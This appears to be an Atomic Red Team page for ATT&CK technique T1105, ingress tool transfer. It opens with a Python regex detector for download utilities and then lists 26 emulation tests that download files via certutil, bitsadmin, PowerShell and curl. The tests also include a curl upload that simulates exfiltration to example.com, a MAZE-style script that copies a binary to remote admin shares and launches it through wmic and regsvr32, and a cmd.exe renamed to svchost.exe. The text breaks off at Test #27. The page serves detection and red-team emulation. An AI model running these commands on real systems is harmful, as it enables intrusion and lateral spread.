T1105 - Ingress Tool Transfer

Description from ATT&CK

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas) A number of these tools, such as wget, curl, and scp, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via certutil -hashfile).(Citation: Google Cloud Threat Intelligence COSMICENERGY 2023)

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).(Citation: T1105: Trellix_search-ms)

Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
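
A detection-side illustration, added here and not part of ATT&CK or Atomic Red Team: regex rules for the Windows download utilities named in the description and exercised by the atomic tests on this page, run over constructed command lines built from the tests' default inputs. The rule labels, function names and the staging-directory list are assumptions of this example.

```python
import re

# Constructed rules keyed to the download utilities on this page. Matching is
# case-insensitive, and certutil switches accept "-" or "/" as the prefix
# because the page notes that /urlcache and /verifyctl also work.
RULES = [
    ("certutil-download", r"\bcertutil(?:\.exe)?\b.*?[-/](?:urlcache|verifyctl)\b"),
    ("bitsadmin-transfer", r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b"),
    ("mpcmdrun-downloadfile", r"\bmpcmdrun(?:\.exe)?\b.*?-downloadfile\b"),
    ("certreq-post", r"\bcertreq(?:\.exe)?\b.*?-post\b.*?-config\b"),
    ("powershell-webclient", r"\bnet\.webclient\b.*?\.download(?:file|string)\b"),
    # PowerShell binds unambiguous parameter prefixes, so -OutF works like -OutFile.
    ("powershell-iwr", r"\b(?:iwr|invoke-webrequest)\b.*?\s-outf\w*"),
    ("curl-output", r"\bcurl(?:\.exe)?\b.*?\s(?:-o|--output)\s"),
]
COMPILED = [(label, re.compile(rx, re.IGNORECASE)) for label, rx in RULES]

URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"')]+", re.IGNORECASE)

# Assumption: user-writable drop locations, taken from the paths the tests use.
STAGING_RE = re.compile(
    r"c:\\users\\public\\|c:\\programdata\\|%temp%\\|\$env:temp\\", re.IGNORECASE
)


def analyze(cmdline):
    """Return a finding dict for one process command line, or None if no rule hits."""
    hits = [label for label, rx in COMPILED if rx.search(cmdline)]
    if not hits:
        return None
    return {
        "rules": hits,
        "urls": URL_RE.findall(cmdline),
        "staging_dir": bool(STAGING_RE.search(cmdline)),
    }


def scan(cmdlines):
    """Analyze many command lines and keep only the ones that produced a finding."""
    findings = []
    for line in cmdlines:
        result = analyze(line)
        if result is not None:
            findings.append((line, result))
    return findings


LICENSE_URL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt"
DLL_URL = ("https://github.com/redcanaryco/atomic-red-team/raw/"
           "058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll")

# Constructed sample telemetry: the page's attack commands with default inputs
# filled in, plus two benign lines that must not alert.
SAMPLES = [
    "cmd /c certutil -urlcache -split -f " + LICENSE_URL + " Atomic-license.txt",
    "CertUtil.exe /VerifyCtl -split -f " + LICENSE_URL,
    r"C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH "
    + LICENSE_URL + r" %temp%\Atomic-license.txt",
    "MpCmdRun.exe -DownloadFile -url " + LICENSE_URL + r" -path %temp%\Atomic-license.txt",
    r"certreq.exe -Post -config https://example.com c:\windows\win.ini %temp%\Atomic-license.txt",
    'powershell.exe -c (New-Object System.Net.WebClient).DownloadFile("'
    + LICENSE_URL + r'", "$env:TEMP\Atomic-license.txt")',
    "powershell.exe iwr -URI " + LICENSE_URL + r" -Outfile %temp%\Atomic-license.txt",
    r"C:\Windows\System32\Curl.exe -k " + DLL_URL
    + r" -o c:\users\public\music\allthethingsx64.dll",
    r"certutil -hashfile C:\Temp\sample.zip SHA256",  # hashing only, no download
    "curl.exe --version",                              # no output switch
]

if __name__ == "__main__":
    for line, finding in scan(SAMPLES):
        print(finding["rules"], finding["urls"], "staging" if finding["staging_dir"] else "")
```

Command-line matching keys on the executable name, so a renamed binary (as Test #12 does with cmd.exe) slips past it; pair these rules with original-file-name or hash fields where the telemetry provides them.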

Atomic Tests


Atomic Test #1 - rsync remote file copy (push)

Utilize rsync to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_path | Remote path to receive rsync | path | /tmp/victim-files |
| remote_host | Remote host to copy toward | string | victim-host |
| local_path | Path of folder to copy | path | /tmp/adversary-rsync/ |
| username | User account to authenticate on remote host | string | victim |

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}

Dependencies: Run with sh!

Description: rsync must be installed on the machine
Check Prereq Commands:
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
Get Prereq Commands:
(pkg install -y rsync)||(sudo apt-get -y install rsync)


Atomic Test #2 - rsync remote file copy (pull)

Utilize rsync to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_path | Path of folder to copy | path | /tmp/adversary-rsync/ |
| remote_host | Remote host to copy from | string | adversary-host |
| local_path | Local path to receive rsync | path | /tmp/victim-files |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with sh!

rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}

Dependencies: Run with sh!

Description: rsync must be installed on the machine
Check Prereq Commands:
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
Get Prereq Commands:
(pkg install -y rsync)||(sudo apt-get -y install rsync)


Atomic Test #3 - scp remote file copy (push)

Utilize scp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_path | Remote path to receive scp | path | /tmp/victim-files/ |
| local_file | Path of file to copy | path | /tmp/adversary-scp |
| remote_host | Remote host to copy toward | string | victim-host |
| username | User account to authenticate on remote host | string | victim |

Attack Commands: Run with sh!

scp #{local_file} #{username}@#{remote_host}:#{remote_path}


Atomic Test #4 - scp remote file copy (pull)

Utilize scp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_host | Remote host to copy from | string | adversary-host |
| local_path | Local path to receive scp | path | /tmp/victim-files/ |
| remote_file | Path of file to copy | path | /tmp/adversary-scp |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with sh!

scp #{username}@#{remote_host}:#{remote_file} #{local_path}


Atomic Test #5 - sftp remote file copy (push)

Utilize sftp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_path | Remote path to receive sftp | path | /tmp/victim-files/ |
| local_file | Path of file to copy | path | /tmp/adversary-sftp |
| remote_host | Remote host to copy toward | string | victim-host |
| username | User account to authenticate on remote host | string | victim |

Attack Commands: Run with bash!

sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'


Atomic Test #6 - sftp remote file copy (pull)

Utilize sftp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_host | Remote host to copy from | string | adversary-host |
| local_path | Local path to receive sftp | path | /tmp/victim-files/ |
| remote_file | Path of file to copy | path | /tmp/adversary-sftp |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with sh!

sftp #{username}@#{remote_host}:#{remote_file} #{local_path}


Atomic Test #7 - certutil download (urlcache)

Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!

Supported Platforms: Windows

auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| local_path | Local path to place file | path | Atomic-license.txt |

Attack Commands: Run with command_prompt!

cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}

Cleanup Commands:

del #{local_path} >nul 2>&1


Atomic Test #8 - certutil download (verifyctl)

Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!

Supported Platforms: Windows

auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| local_path | Local path to place file | path | Atomic-license.txt |

Attack Commands: Run with powershell!

$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }

Cleanup Commands:

Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore


Atomic Test #9 - Windows - BITSAdmin BITS Download

This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.

Supported Platforms: Windows

auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| bits_job_name | Name of the created BITS job | string | qcxjb7 |
| local_path | Local path to place file | path | %temp%\Atomic-license.txt |
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |

Attack Commands: Run with command_prompt!

C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}


Atomic Test #10 - Windows - PowerShell Download

This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families.

Supported Platforms: Windows

auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| destination_path | Destination path to file | path | $env:TEMP\Atomic-license.txt |

Attack Commands: Run with powershell!

(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")

Cleanup Commands:

Remove-Item #{destination_path} -Force -ErrorAction Ignore


Atomic Test #11 - OSTAP Worming Activity

OSTap copies itself in a specific way to shares and secondary drives. This emulates the activity.

Supported Platforms: Windows

auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| destination_path | Path to create remote file at. Default is local admin share. | string | \\localhost\C$ |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd


Atomic Test #12 - svchost writing a file to a UNC path

svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to c:\, then execute svchost.exe with output to a txt file.

Supported Platforms: Windows

auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt

Cleanup Commands:

del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1


Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe

Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory.

More info and how to find your version can be found here: https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/

Supported Platforms: Windows

auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| local_path | Location to save downloaded file | path | %temp%\Atomic-license.txt |

Attack Commands: Run with command_prompt!

cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}

Cleanup Commands:

del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1

Dependencies: Run with command_prompt!

Description: Must have a Windows Defender version with MpCmdRun.exe installed
Check Prereq Commands:
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe /?  >nul 2>&1
Get Prereq Commands:
Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"


Atomic Test #14 - whois file download

Download a remote file using the whois utility

Supported Platforms: Linux, macOS

auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_host | Remote hostname or IP address | string | localhost |
| remote_port | Remote port to connect to | integer | 8443 |
| output_file | Path of file to save output to | path | /tmp/T1105.whois.out |
| query | Query to send to remote server | string | Hello from Atomic Red Team test T1105 |
| timeout | Timeout period before ending process (seconds) | integer | 1 |

Attack Commands: Run with sh!

timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}

Cleanup Commands:

rm -f #{output_file}

Dependencies: Run with sh!

Description: The whois and timeout commands must be present
Check Prereq Commands:
which whois && which timeout
Get Prereq Commands:
echo "Please install timeout and the whois package"


Atomic Test #15 - File Download via PowerShell

Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.

Supported Platforms: Windows

auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| target_remote_file | File to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt |
| output_file | File to write to | string | LICENSE.txt |

Attack Commands: Run with powershell!

(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}


Atomic Test #16 - File download with finger.exe on Windows

Simulate a file download using finger.exe. The test connects to localhost by default; use the custom input argument to test finger connecting to an external server. Because this is being tested on the localhost, you should not be expecting a successful connection. References: https://www.exploit-db.com/exploits/48815 https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/

Supported Platforms: Windows

auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_host | Remote hostname or IP address | string | localhost |

Attack Commands: Run with command_prompt!

finger base64_filedata@#{remote_host}


Atomic Test #17 - Download a file with IMEWDBLD.exe

Use IMEWDBLD.exe (built-in to Windows) to download a file. This will throw an error for an invalid dictionary file. Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or "%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>". Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.

Supported Platforms: Windows

auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| remote_url | Location of file to be downloaded. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml |
| file_name | Name of the file to be downloaded without extension. | string | T1105 |

Attack Commands: Run with powershell!

$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}

Cleanup Commands:

$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" 
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }


Atomic Test #18 - Curl Download File

The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not.

Supported Platforms: Windows

auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| file_download | File to download | string | https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll |
| curl_path | path to curl.exe | path | C:\Windows\System32\Curl.exe |

Attack Commands: Run with command_prompt!

#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll

Cleanup Commands:

del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1

Dependencies: Run with powershell!

Description: Curl must be installed on system.
Check Prereq Commands:
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"


Atomic Test #19 - Curl Upload File

The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration. Expected output will include whether the file uploaded successfully or not.

Supported Platforms: Windows

auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| curl_path | path to curl.exe | path | C:\Windows\System32\Curl.exe |
| remote_destination | Remote destination | string | www.example.com |
| file_path | File to upload | string | c:\temp\atomictestfile.txt |

Attack Commands: Run with command_prompt!

#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}

Dependencies: Run with powershell!

Description: Curl must be installed on system.
Check Prereq Commands:
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Description: A file must be created to upload
Check Prereq Commands:
if (Test-Path #{file_path}) {exit 0} else {exit 1}
Get Prereq Commands:
echo "This is an Atomic Test File" > #{file_path}


Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download

Uses cmdl32 to download an arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection; however, the config is modified to download the arbitrary file. cmdl32.exe would otherwise detect that the payload is not a VPN server profile and delete it; the test avoids this by setting a temporary TMP folder and denying the user the delete permission on all files. Upon successful execution the test will open calculator and Notepad executable for 10 seconds. References: https://twitter.com/ElliotKillick/status/1455897435063074824 https://github.com/LOLBAS-Project/LOLBAS/pull/151 https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html

Supported Platforms: Windows

auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| Path_to_file | Path to the Batch script | path | PathToAtomicsFolder\T1105\src\T1105.bat |

Attack Commands: Run with command_prompt!

"#{Path_to_file}" 1>NUL

Cleanup Commands:

del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1

Dependencies: Run with powershell!

Description: #{Path_to_file} must exist on system.
Check Prereq Commands:
if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"


Atomic Test #21 - MAZE Propagation Script

This test simulates MAZE ransomware's propagation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. Upon successful execution, the test attempts to copy a specified binary file to each online machine, and a list of the online machines, as well as a list of offline machines, is output to a specified location. Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

Supported Platforms: Windows

auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| binary_file | Binary file to copy to remote machines | string | $env:comspec |
| exe_remote_folder | Path to store executable on remote machine (no drive letter) | string | \Windows\Temp\T1105.exe |
| remote_drive_letter | Remote drive letter | string | C |

Attack Commands: Run with powershell!

$machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
$offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
$completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet) 
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}

Cleanup Commands:

if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") 
{foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: Binary file must exist at specified location (#{binary_file})
Check Prereq Commands:
if (Test-Path #{binary_file}) {exit 0} else {exit 1}
Get Prereq Commands:
write-host "The binary_file input parameter must be set to a binary that exists on this computer."
Description: Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt")
Check Prereq Commands:
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."


Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file

Create a ZIP file from a folder in a remote drive

Supported Platforms: Windows

auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| Path_unc | Path to the UNC folder | path | \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\ |
| Path_PrintBrm | Path to PrintBrm.exe | path | C:\Windows\System32\spool\tools\PrintBrm.exe |

Attack Commands: Run with command_prompt!

del %TEMP%\PrintBrm.zip >nul 2>&1 
#{Path_PrintBrm} -b -d #{Path_unc}  -f %TEMP%\PrintBrm.zip -O FORCE

Cleanup Commands:

del %TEMP%\PrintBrm.zip >nul 2>&1


Atomic Test #23 - Lolbas replace.exe use to copy file

Copy file.cab to destination. Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/

Supported Platforms: Windows

auto_generated_guid: 54782d65-12f0-47a5-b4c1-b70ee23de6df

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| replace_cab | Path to the cab file | path | PathToAtomicsFolder\T1105\src\redcanary.cab |
| Path_replace | Path to replace.exe | path | C:\Windows\System32\replace.exe |

Attack Commands: Run with command_prompt!

del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} "#{replace_cab}" %TEMP% /A

Cleanup Commands:

del %TEMP%\redcanary.cab >nul 2>&1

Dependencies: Run with powershell!

Description: #{replace_cab} must exist on system.
Check Prereq Commands:
if (Test-Path "#{replace_cab}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"


Atomic Test #24 - Lolbas replace.exe use to copy UNC file

Copy UNC file to destination. Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/

Supported Platforms: Windows

auto_generated_guid: ed0335ac-0354-400c-8148-f6151d20035a

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| replace_cab | UNC Path to the cab file | path | \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab |
| Path_replace | Path to replace.exe | path | C:\Windows\System32\replace.exe |

Attack Commands: Run with command_prompt!

del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} #{replace_cab} %TEMP% /A

Cleanup Commands:

del %TEMP%\redcanary.cab >nul 2>&1


Atomic Test #25 - certreq download

Use certreq to download a file from the web

Supported Platforms: Windows

auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| local_path | Local path to place file | string | %temp%\Atomic-license.txt |
| remote_file | URL of file to copy | url | https://example.com |

Attack Commands: Run with command_prompt!

certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}

Cleanup Commands:

del #{local_path} >nul 2>&1


Atomic Test #26 - Download a file using wscript

Use wscript to run a local VisualBasic file to download a remote file

Supported Platforms: Windows

auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188

Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| vbscript_file | Full path to the VisualBasic downloading the file | string | PathToAtomicsFolder\T1105\src\T1105-download-file.vbs |

Attack Commands: Run with command_prompt!

wscript.exe "#{vbscript_file}"

Cleanup Commands:

del Atomic-License.txt >nul 2>&1

Dependencies: Run with powershell!

Description: #{vbscript_file} must exist on system.
Check Prereq Commands:
if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"


Atomic Test #27 - Linux Download File and Run

